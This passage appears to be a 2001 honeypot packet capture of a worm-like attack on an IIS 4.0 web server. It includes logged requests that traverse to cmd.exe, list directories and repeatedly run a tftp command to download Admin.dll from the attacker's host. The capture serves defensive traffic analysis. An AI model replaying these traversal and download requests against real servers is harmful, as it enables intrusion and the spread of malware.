170 : 2F 73 74 72 6F 6E 67 3E 3C 2F 70 3E 0D 0A 0D 0A
/strong></p>....
180 : 3C 70 3E 54 68 65 20 57 65 62 20 73 65 72 76 65 <p>The Web
serve
190 : 72 20 63 61 6E 6E 6F 74 20 66 69 6E 64 20 74 68 r cannot find th
1a0 : 65 20 66 69 6C 65 20 6F 72 20 73 63 72 69 70 74 e file or script
1b0 : 20 79 6F 75 20 61 73 6B 65 64 20 66 6F 72 2E 20 you asked for.
1c0 : 50 6C 65 61 73 65 20 63 68 65 63 6B 20 74 68 65 Please check the
1d0 : 20 55 52 4C 20 74 6F 20 65 6E 73 75 72 65 20 74 URL to ensure t
1e0 : 68 61 74 20 74 68 65 20 70 61 74 68 20 69 73 20 hat the path is
1f0 : 63 6F 72 72 65 63 74 2E 3C 2F 70 3E 0D 0A 0D 0A
correct.</p>....
200 : 3C 70 3E 50 6C 65 61 73 65 20 63 6F 6E 74 61 63 <p>Please
contac
210 : 74 20 74 68 65 20 73 65 72 76 65 72 27 73 20 61 t the server's a
220 : 64 6D 69 6E 69 73 74 72 61 74 6F 72 20 69 66 20 dministrator if
230 : 74 68 69 73 20 70 72 6F 62 6C 65 6D 20 70 65 72 this problem per
240 : 73 69 73 74 73 2E 3C 2F 70 3E 0D 0A 0D 0A 3C 2F
sists.</p>....</
250 : 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
body></html>
----------------------------------------------------------------------------
--
#(2 - 25569) [2001-09-18 10:21:39] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=47110 flags=0 offset=0 TTL=128 chksum=37268
TCP: port=80 -> dport: 4070 flags=***A***F seq=552428
ack=483904459 off=5 res=0 win=8663 urp=0 chksum=30202
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25570) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=49779 flags=0 offset=0 TTL=118 chksum=37159
TCP: port=4070 -> dport: 80 flags=*****R** seq=483904459
ack=0 off=5 res=0 win=0 urp=0 chksum=1491
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25571) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=50035 flags=0 offset=0 TTL=118 chksum=36899
TCP: port=4144 -> dport: 80 flags=******S* seq=483905021
ack=0 off=6 res=0 win=8192 urp=0 chksum=52124
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25572) [2001-09-18 10:21:40] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=47622 flags=0 offset=0 TTL=128 chksum=36752
TCP: port=80 -> dport: 4144 flags=***A**S* seq=552724
ack=483905022 off=6 res=0 win=8760 urp=0 chksum=23095
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25573) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=50291 flags=0 offset=0 TTL=118 chksum=53031
TCP: port=4070 -> dport: 80 flags=*****R** seq=483904459
ack=483904459 off=5 res=0 win=0 urp=0 chksum=7472
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25575) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=47220 flags=0 offset=0 TTL=119 chksum=39462
TCP: port=4144 -> dport: 80 flags=***A**** seq=483905022
ack=552725 off=5 res=0 win=8760 urp=0 chksum=29172
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25576) [2001-09-18 10:21:40] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=137 ID=47476 flags=0 offset=0 TTL=119 chksum=39109
TCP: port=4144 -> dport: 80 flags=***AP*** seq=483905022
ack=552725 off=5 res=0 win=8760 urp=0 chksum=45567
Payload: length = 91
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 20 /cmd.exe?/c+dir
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F dir HTTP/1.0..Ho
040 : 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 st: www..Connnec
050 : 74 69 6F 6E 3A 20 63 6C 6F 73 65 tion: close
----------------------------------------------------------------------------
--
#(2 - 25577) [2001-09-18 10:21:40] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=231 ID=51206 flags=0 offset=0 TTL=128 chksum=32981
TCP: port=80 -> dport: 4144 flags=***AP*** seq=552725
ack=483905119 off=5 res=0 win=8663 urp=0 chksum=9020
Payload: length = 191
000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 35 3A 32 31 20 47 4D 54 0D 01 16:05:21 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25578) [2001-09-18 10:21:40] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=403 ID=51462 flags=0 offset=0 TTL=128 chksum=32553
TCP: port=80 -> dport: 4144 flags=***AP**F seq=552916
ack=483905119 off=5 res=0 win=8663 urp=0 chksum=30915
Payload: length = 363
000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 31 ....09/18/01 11
030 : 3A 30 35 61 20 20 20 20 20 20 20 20 3C 44 49 52 :05a <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09
050 : 2F 31 38 2F 30 31 20 20 31 31 3A 30 35 61 20 20 /18/01 11:05a
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR>
070 : 20 20 20 20 20 2E 2E 0D 0A 30 39 2F 31 38 2F 30 ....09/18/0
080 : 31 20 20 31 31 3A 30 34 61 20 20 20 20 20 20 20 1 11:04a
090 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
0a0 : 54 46 54 50 32 30 36 0D 0A 30 39 2F 31 38 2F 30 TFTP206..09/18/0
0b0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
0c0 : 20 20 20 20 20 20 20 20 20 20 37 2C 31 36 38 20 7,168
0d0 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30 TFTP222..09/18/0
0e0 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20 1 11:05a
0f0 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20 57,344
100 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20 TFTP84..
110 : 20 20 20 20 20 20 20 35 20 46 69 6C 65 28 73 29 5 File(s)
120 : 20 20 20 20 20 20 20 20 31 32 31 2C 38 35 36 20 121,856
130 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20 bytes..
140 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
150 : 20 32 2C 31 30 30 2C 36 31 36 2C 37 30 34 20 62 2,100,616,704 b
160 : 79 74 65 73 20 66 72 65 65 0D 0A ytes free..
----------------------------------------------------------------------------
--
#(2 - 25579) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=57460 flags=0 offset=0 TTL=118 chksum=29478
TCP: port=4144 -> dport: 80 flags=*****R** seq=483905119
ack=0 off=5 res=0 win=0 urp=0 chksum=757
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25580) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=57716 flags=0 offset=0 TTL=118 chksum=29218
TCP: port=4381 -> dport: 80 flags=******S* seq=483907846
ack=0 off=6 res=0 win=8192 urp=0 chksum=49062
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25581) [2001-09-18 10:21:40] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=51718 flags=0 offset=0 TTL=128 chksum=32656
TCP: port=80 -> dport: 4381 flags=***A**S* seq=553485
ack=483907847 off=6 res=0 win=8760 urp=0 chksum=19272
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25582) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=57972 flags=0 offset=0 TTL=118 chksum=45350
TCP: port=4144 -> dport: 80 flags=*****R** seq=483905119
ack=483905119 off=5 res=0 win=0 urp=0 chksum=6078
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25583) [2001-09-18 10:21:40] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=61044 flags=0 offset=0 TTL=119 chksum=25638
TCP: port=4381 -> dport: 80 flags=***A**** seq=483907847
ack=553486 off=5 res=0 win=8760 urp=0 chksum=25349
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25584) [2001-09-18 10:21:40] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=192 ID=61300 flags=0 offset=0 TTL=119 chksum=25230
TCP: port=4381 -> dport: 80 flags=***AP*** seq=483907847
ack=553486 off=5 res=0 win=8760 urp=0 chksum=26684
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 63 3A c:\Admin.dll 0c:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25585) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=52486 flags=0 offset=0 TTL=128 chksum=31537
TCP: port=80 -> dport: 4381 flags=***AP*** seq=553486
ack=483907999 off=5 res=0 win=8608 urp=0 chksum=63688
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74 :05:21 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25586) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=52742 flags=0 offset=0 TTL=128 chksum=31636
TCP: port=80 -> dport: 4381 flags=***A***F seq=553841
ack=483907999 off=5 res=0 win=8608 urp=0 chksum=24993
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25587) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=1397 flags=0 offset=0 TTL=118 chksum=20006
TCP: port=4381 -> dport: 80 flags=*****R** seq=483907999
ack=2622773535 off=5 res=0 win=0 urp=0 chksum=340
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25588) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=1653 flags=0 offset=0 TTL=118 chksum=19746
TCP: port=4392 -> dport: 80 flags=******S* seq=483907905
ack=0 off=6 res=0 win=8192 urp=0 chksum=48992
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25589) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=52998 flags=0 offset=0 TTL=128 chksum=31376
TCP: port=80 -> dport: 4392 flags=***A**S* seq=553766
ack=483907906 off=6 res=0 win=8760 urp=0 chksum=18921
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25590) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=1909 flags=0 offset=0 TTL=118 chksum=35878
TCP: port=4381 -> dport: 80 flags=*****R** seq=483907999
ack=483907999 off=5 res=0 win=0 urp=0 chksum=81
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25591) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=8053 flags=0 offset=0 TTL=119 chksum=13094
TCP: port=4392 -> dport: 80 flags=***A**** seq=483907906
ack=553767 off=5 res=0 win=8760 urp=0 chksum=24998
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25592) [2001-09-18 10:21:41] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=192 ID=8309 flags=0 offset=0 TTL=119 chksum=12686
TCP: port=4392 -> dport: 80 flags=***AP*** seq=483907906
ack=553767 off=5 res=0 win=8760 urp=0 chksum=26077
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 64 3A d:\Admin.dll 0d:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25593) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=53510 flags=0 offset=0 TTL=128 chksum=30513
TCP: port=80 -> dport: 4392 flags=***AP*** seq=553767
ack=483908058 off=5 res=0 win=8608 urp=0 chksum=63337
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 32 31 20 47 4D 54 0D 0A 43 6F 6E 74 :05:21 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25594) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=53766 flags=0 offset=0 TTL=128 chksum=30612
TCP: port=80 -> dport: 4392 flags=***A***F seq=554122
ack=483908058 off=5 res=0 win=8608 urp=0 chksum=24642
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25595) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=18805 flags=0 offset=0 TTL=118 chksum=2598
TCP: port=4392 -> dport: 80 flags=*****R** seq=483908058
ack=0 off=5 res=0 win=0 urp=0 chksum=63105
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25596) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=19061 flags=0 offset=0 TTL=118 chksum=2338
TCP: port=4419 -> dport: 80 flags=******S* seq=483908121
ack=0 off=6 res=0 win=8192 urp=0 chksum=48749
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25597) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=55302 flags=0 offset=0 TTL=128 chksum=29072
TCP: port=80 -> dport: 4419 flags=***A**S* seq=554266
ack=483908122 off=6 res=0 win=8760 urp=0 chksum=18178
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25598) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=19317 flags=0 offset=0 TTL=118 chksum=18470
TCP: port=4392 -> dport: 80 flags=*****R** seq=483908058
ack=483908058 off=5 res=0 win=0 urp=0 chksum=65487
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25599) [2001-09-18 10:21:41] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=28533 flags=0 offset=0 TTL=119 chksum=58149
TCP: port=4419 -> dport: 80 flags=***A**** seq=483908122
ack=554267 off=5 res=0 win=8760 urp=0 chksum=24255
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25600) [2001-09-18 10:21:41] WEB-IIS cmd.exe access
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=192 ID=28789 flags=0 offset=0 TTL=119 chksum=57741
TCP: port=4419 -> dport: 80 flags=***AP*** seq=483908122
ack=554267 off=5 res=0 win=8760 urp=0 chksum=25078
Payload: length = 136
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 0C GET /scripts/...
010 : 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 ./winnt/system32
020 : 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 66 74 70 /cmd.exe?/c+tftp
030 : 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 2E 31 38 -i 65.29.243.18
040 : 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 6C 6C 20 0 GET Admin.dll
050 : 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 30 65 3A e:\Admin.dll 0e:
060 : 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 2F \Admin.dll HTTP/
070 : 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 1.0..Host: www..
080 : 43 6F 6E 6E 6E 65 63 74 Connnect
----------------------------------------------------------------------------
--
#(2 - 25601) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=57862 flags=0 offset=0 TTL=128 chksum=26161
TCP: port=80 -> dport: 4419 flags=***AP*** seq=554267
ack=483908274 off=5 res=0 win=8608 urp=0 chksum=62593
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 35 3A 32 32 20 47 4D 54 0D 0A 43 6F 6E 74 :05:22 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25602) [2001-09-18 10:21:41] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=58118 flags=0 offset=0 TTL=128 chksum=26260
TCP: port=80 -> dport: 4419 flags=***A***F seq=554622
ack=483908274 off=5 res=0 win=8608 urp=0 chksum=23899
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25603) [2001-09-18 10:21:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=45429 flags=0 offset=0 TTL=118 chksum=41509
TCP: port=4419 -> dport: 80 flags=*****R** seq=483908274
ack=2875805349 off=5 res=0 win=0 urp=0 chksum=64383
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25604) [2001-09-18 10:21:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=45685 flags=0 offset=0 TTL=118 chksum=41249
TCP: port=4454 -> dport: 80 flags=******S* seq=483908463
ack=0 off=6 res=0 win=8192 urp=0 chksum=48372
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25605) [2001-09-18 10:21:42] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=63238 flags=0 offset=0 TTL=128 chksum=21136
TCP: port=80 -> dport: 4454 flags=***A**S* seq=555058
ack=483908464 off=6 res=0 win=8760 urp=0 chksum=17009
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25606) [2001-09-18 10:21:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=45941 flags=0 offset=0 TTL=118 chksum=57381
TCP: port=4419 -> dport: 80 flags=*****R** seq=483908274
ack=483908274 off=5 res=0 win=0 urp=0 chksum=65028
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25607) [2001-09-18 10:21:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=64629 flags=0 offset=0 TTL=119 chksum=22053
TCP: port=4454 -> dport: 80 flags=***A**** seq=483908464
ack=555059 off=5 res=0 win=8760 urp=0 chksum=23086
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25608) [2001-09-18 10:21:42] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=117 ID=64885 flags=0 offset=0 TTL=119 chksum=21720
